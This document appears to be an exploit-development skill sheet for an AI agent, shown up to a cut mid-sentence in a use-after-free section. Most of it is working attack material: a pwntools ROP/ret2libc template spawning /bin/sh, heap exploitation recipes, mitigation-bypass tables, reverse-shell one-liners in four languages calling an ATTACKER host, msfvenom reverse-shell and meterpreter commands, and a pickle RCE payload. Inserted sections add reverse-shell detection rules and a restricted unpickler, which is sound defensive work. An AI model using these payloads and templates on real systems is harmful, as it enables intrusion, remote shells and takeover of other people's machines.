Exploit Development
When to Activate
- Confirmed vulnerability needs working PoC
- Binary exploitation (stack/heap overflow, format string, UAF)
- Web exploitation requiring custom payloads
- Bypass of security mitigations (ASLR, DEP, canaries, CFI)
- Shellcode development for specific architectures
Binary Exploitation
Stack Buffer Overflow
```python
from pwn import *

# Template: stack overflow with ROP
elf = ELF('./vulnerable')
rop = ROP(elf)
libc = ELF('./libc.so.6')

# Find offset
offset = cyclic_find(core.fault_addr)  # or pattern_offset

# Leak libc address
rop.puts(elf.got['puts'])
rop.call(elf.symbols['main'])  # return to main for second stage
payload = flat(
    b'A' * offset,
    rop.chain()
)

# Stage 2: calculate libc base, call system("/bin/sh")
libc.address = leaked_puts - libc.symbols['puts']
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')))
payload2 = flat(
    b'A' * offset,
    rop2.chain()
)
```
Heap Exploitation
```python
# tcache poisoning (glibc 2.26+)
# 1. Allocate chunks A, B
# 2. Free B, Free A (tcache: A -> B)
# 3. Allocate, overwrite A's fd pointer to target
# 4. Allocate twice — second allocation at target address

# House of Force (old glibc)
# Overwrite top chunk size to -1
# Calculate distance to target
# malloc(distance) consumes wilderness
# Next malloc returns target address

# Fastbin dup
# Free A, Free B, Free A (fastbin: A -> B -> A)
# Allocate with fd = target (must have valid size at target-0x8)
```
Format String Exploitation
```python
# Read: %p %p %p ... (leak stack/libc addresses)
# Write: %n writes number of chars printed so far
# Targeted write: %{offset}$n writes to specific argument

# pwntools fmtstr_payload:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, {target_addr: value}, write_size='short')
```
ROP Chain Construction
```bash
# Find gadgets
ropper --file ./binary --search "pop rdi"
ROPgadget --binary ./binary --ropchain
one_gadget ./libc.so.6  # one-shot execve gadgets

# Common ROP patterns:
# ret2libc: pop rdi; ret -> "/bin/sh" -> system
# ret2csu: __libc_csu_init gadgets for multi-arg calls
# Stack pivot: xchg rsp, rax; ret (pivot to controlled buffer)
# SROP: sigreturn to set all registers
```
Mitigation Bypass
| Mitigation | Bypass Technique |
|---|---|
| ASLR | Info leak (format string, partial overwrite, brute force 12-bit on 32-bit) |
| DEP/NX | ROP, ret2libc, mprotect() to make region executable |
| Stack Canary | Info leak, overwrite only specific vars, thread-local canary overwrite |
| PIE | Partial overwrite (last 12 bits fixed), info leak base address |
| CFI | Dispatch gadgets, COOP (counterfeit OOP), JIT spray |
| RELRO (Full) | Overwrite __malloc_hook, __free_hook (old glibc), exit handlers, TLS-dtor |
| Seccomp | Allowed syscall abuse, kernel bugs, TOCTOU on syscall args |
Web Exploitation Payloads
Reverse Shells
```bash
# Bash
bash -i >& /dev/tcp/ATTACKER/PORT 0>&1

# Python
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

# PHP
php -r '$sock=fsockopen("ATTACKER",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER',PORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
```
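Detection indicators for the one-liners above, as an added example that is not part of the original page: regex rules over process command lines, run against constructed events. The rule names, hosts and events are made up for illustration, and 192.0.2.10 is a documentation address.

```python
import re

# Each rule pairs a network primitive with a shell/interpreter hand-off, the
# combination the one-liners above share; either half alone is common and benign.
RULES = {
    "bash_dev_tcp": re.compile(r"\b(?:ba)?sh\s+-i\b.*/dev/tcp/[^/\s]+/\d+"),
    "python_socket_pty": re.compile(r"python[\d.]*\s+-c\b.*socket.*dup2.*pty\.spawn", re.S),
    "php_fsockopen_exec": re.compile(
        r"php\s+-r\b.*fsockopen\(.*(?:exec|system|passthru)\(.*/bin/(?:ba)?sh", re.S),
    "powershell_tcpclient_iex": re.compile(
        r"powershell.*Net\.Sockets\.TCPClient.*\biex\b", re.I | re.S),
}

def classify(cmdline):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

# Constructed process-creation events: (host, argv joined by spaces).
# Redirections are not part of argv, so the bash form is only visible when a
# parent runs it through `sh -c`, as system()-style command injection does.
EVENTS = [
    ("web01", "sh -c bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"),
    ("web01", 'python3 -c import os,pty,socket;s=socket.socket();s.connect(("192.0.2.10",4444));'
              '[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'),
    ("web02", 'php -r $sock=fsockopen("192.0.2.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'),
    ("win07", "powershell -nop -c $c=New-Object Net.Sockets.TCPClient('192.0.2.10',4444);"
              "$s=$c.GetStream();<read loop elided>;iex $d"),
    ("db01", "sh -c echo > /dev/tcp/10.0.0.5/5432"),                      # benign port probe
    ("dev03", "python3 -c import socket;print(socket.gethostname())"),   # benign
]

def scan(events):
    """Return (host, matched_rules) for every event that trips at least one rule."""
    hits = []
    for host, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits.append((host, matched))
    return hits

if __name__ == "__main__":
    for host, matched in scan(EVENTS):
        print(f"{host}: {', '.join(matched)}")
```

Command-line matching misses payloads that are encoded or read from a file, so pair it with network telemetry: a shell or interpreter process that owns an outbound TCP socket.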
Shellcode Generation
```bash
# Linux x64 reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=PORT -f python -b '\x00'

# Windows x64 meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=PORT -f csharp -e x64/xor_dynamic

# Shellcode constraints:
# - Null-free: avoid \x00 (use xor encoding, sub instead of mov 0)
# - Alphanumeric: only [A-Za-z0-9] (use alpha_mixed encoder)
# - Size-limited: use egg hunter or staged payload
```
Deserialization Exploits
```python
# Python pickle RCE
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

payload = pickle.dumps(Exploit())

# Java (ysoserial)
# java -jar ysoserial.jar CommonsCollections6 'command' | base64

# PHP
# O:8:"Exploit":1:{s:4:"cmd";s:2:"id";}

# .NET (ysoserial.net)
# ysoserial.exe -g TypeConfuseDelegate -f Json.Net -c "command"
```
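The defensive counterpart to the pickle payload above, as an added example that is not from the original page: an allowlisting `Unpickler` plus a static opcode scan that lists the globals a blob would import without loading it. `ALLOWED_GLOBALS`, `Sample` and the helper names are assumptions made for illustration.

```python
import io
import os
import pickle
import pickletools

# Assumption: the application only ever needs these globals; all others are refused.
ALLOWED_GLOBALS = {("collections", "OrderedDict"), ("datetime", "date")}

class RestrictedUnpickler(pickle.Unpickler):
    """Refuse any global lookup outside the allowlist before it is imported."""
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def referenced_globals(data):
    """Static triage: list the (module, name) pairs a pickle imports, without loading it."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):       # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":         # protocol 4+: two strings pushed just before
            found.append(tuple(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

class Sample:
    """Constructed input with the same __reduce__ shape as the payload above; only dumped here."""
    def __reduce__(self):
        return (os.system, ("id",))

def sample_payload(protocol=pickle.DEFAULT_PROTOCOL):
    return pickle.dumps(Sample(), protocol=protocol)

if __name__ == "__main__":
    blob = sample_payload()
    print("globals:", referenced_globals(blob))
    try:
        restricted_loads(blob)
    except pickle.UnpicklingError as exc:
        print("refused:", exc)
```

The scan only resolves names that are pushed literally, which is what `pickle.dumps` emits; a hand-built pickle can fetch them from the memo instead, so treat the scan as triage and the allowlist as the enforcement point.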
Exploit Quality Standards
- PoC must be reliable (>90% success rate stated)
- Document exact versions/conditions required
- Include pre-exploitation checks (version fingerprint)
- Provide cleanup steps post-exploitation
- Note detection indicators for blue team awareness
Advanced: Modern Heap Exploitation
tcache Poisoning (glibc 2.26-2.35)
```python
from pwn import *

# tcache: per-thread cache, singly-linked list, LIFO
# No integrity checks in glibc < 2.32
# glibc 2.32+: safe-linking (XOR fd with heap address >> 12)

# Classic tcache poisoning:
# 1. Allocate A, B (same tcache bin)
# 2. Free A, Free B → tcache: B → A
# 3. Overwrite B's fd pointer (via UAF or overflow) to target
# 4. malloc() returns B, next malloc() returns target address
# 5. Write arbitrary data at target

# Safe-linking bypass (glibc 2.32+):
# fd is stored as: (fd_addr >> 12) ^ next_ptr
# Need heap leak to calculate: real_fd = leak ^ (target_addr)
# Formula: encrypted_fd = (chunk_addr >> 12) ^ target_addr
```
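How the safe-linking encoding described above behaves as a mitigation, as an added example that is not part of the original page: a Python model of glibc's `PROTECT_PTR`/`REVEAL_PTR` and of the alignment check on decoded tcache entries, showing why an `fd` overwritten without knowledge of the heap address usually aborts the process. All addresses are constructed, and 64-bit glibc with 16-byte chunk alignment is assumed.

```python
# Model of glibc 2.32+ safe-linking (PROTECT_PTR / REVEAL_PTR in malloc.c) on 64-bit.
PTR_MASK = (1 << 64) - 1
MALLOC_ALIGN_MASK = 0xF          # chunks are 16-byte aligned on 64-bit glibc

def protect_ptr(pos, ptr):
    """Value stored in the fd field that lives at address `pos`."""
    return ((pos >> 12) ^ ptr) & PTR_MASK

def reveal_ptr(pos, stored):
    """What malloc recovers from the fd field at `pos` (XOR is its own inverse)."""
    return protect_ptr(pos, stored)

def tcache_next(pos, stored):
    """Decode the next entry and apply the alignment check glibc runs before handing it out."""
    nxt = reveal_ptr(pos, stored)
    if nxt & MALLOC_ALIGN_MASK:
        raise RuntimeError("malloc(): unaligned tcache chunk detected")
    return nxt

def raw_overwrite_caught(pos, raw_value):
    """True if an fd overwritten with an unmasked pointer (no heap leak) aborts."""
    try:
        tcache_next(pos, raw_value)
    except RuntimeError:
        return True
    return False

def caught_out_of_16(raw_value=0x7F0000001000, page_base=0x555555550000):
    """Count aborts across the 16 values that ASLR can give bits 12-15 of `pos`."""
    positions = [page_base + (n << 12) + 0x2A0 for n in range(16)]
    return sum(raw_overwrite_caught(pos, raw_value) for pos in positions)

if __name__ == "__main__":
    pos, nxt = 0x55555555B2A0, 0x55555555B300      # constructed heap addresses
    stored = protect_ptr(pos, nxt)
    print(hex(stored), "->", hex(tcache_next(pos, stored)))
    print("list terminator encodes as", hex(protect_ptr(pos, 0)))
    print("raw overwrites caught:", caught_out_of_16(), "of 16")
```

The terminator line shows why the scheme depends on heap addresses staying secret: a NULL `next` is stored as `pos >> 12`, so any read of a freed chunk's `fd` discloses the mask.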
House of Apple (glibc 2.35+)
```python
# Modern technique when __malloc_hook/__free_hook are removed (glibc 2.34+)
# Target: _IO_FILE structures (stdout/stderr/stdin)

# House of Apple 2:
# 1. Get arbitrary write primitive (heap overflow, UAF)
# 2. Corrupt _IO_list_all to point to fake FILE structure
# 3. Fake FILE has: _wide_data → _wide_vtable → controlled function pointer
# 4. Trigger: exit() or FSOP (File Stream Oriented Programming)
# 5. Code execution via _IO_wstr_overflow or _IO_wdefault_xsputn

# Key structures:
# struct _IO_FILE_plus { _IO_FILE file; _IO_jump_t *vtable; }
# vtable is checked against valid range (__libc_IO_vtables section)
# BUT: _wide_vtable is NOT checked → use _IO_wfile_jumps as target
```
House of Einherjar (Heap Consolidation)
```python
# Exploit backward consolidation in glibc
# 1. Overflow null byte into next chunk's prev_inuse flag
# 2. Set fake prev_size to trick free() into consolidating
# 3. Overlapping chunks → read/write freed chunk metadata
# 4. Tcache/fastbin poisoning from overlapping region

# Requirements: single null byte overflow (off-by-one)
# Result: overlapping heap chunks → controlled metadata corruption
```
House of Botcake (tcache + unsorted bin)
```python
# Combine tcache and unsorted bin for double-free without detection
# 1. Fill tcache (7 entries for size)
# 2. Free chunk A → goes to unsorted bin
# 3. Free chunk B (adjacent) → consolidates with A in unsorted bin
# 4. Empty tcache entries
# 5. Free chunk B again → B is now in BOTH unsorted bin AND tcache
# 6. Allocate from unsorted bin (get consolidated A+B)
# 7. Overwrite B's fd in tcache → arbitrary write
```
Advanced: Type Confusion & UAF Patterns
Browser-Style Type Confusion
```javascript
// V8 (Chrome) type confusion pattern:
// Objects have a "map" (hidden class) that describes their layout
// Type confusion: make engine think object A has type B's map
// Access fields at wrong offsets → OOB read/write

// JIT confusion:
// 1. Create object with type A (known layout)
// 2. JIT compiler optimizes based on type A's map
// 3. Change object's map to type B (different field offsets)
// 4. JIT'd code accesses wrong memory → OOB

// Exploitation:
// Type confusion → OOB access → read/write primitive →
// fake object → addrof/fakeobj → arbitrary R/W →
// overwrite JIT page → shellcode execution
```
Use-After-Free Exploitation
// Classic UAF pattern:
// 1. Allocate object (e.g., 0x80 bytes)
// 2. Store function pointer or vtable in object
// 3. Free object (memory returned to allocat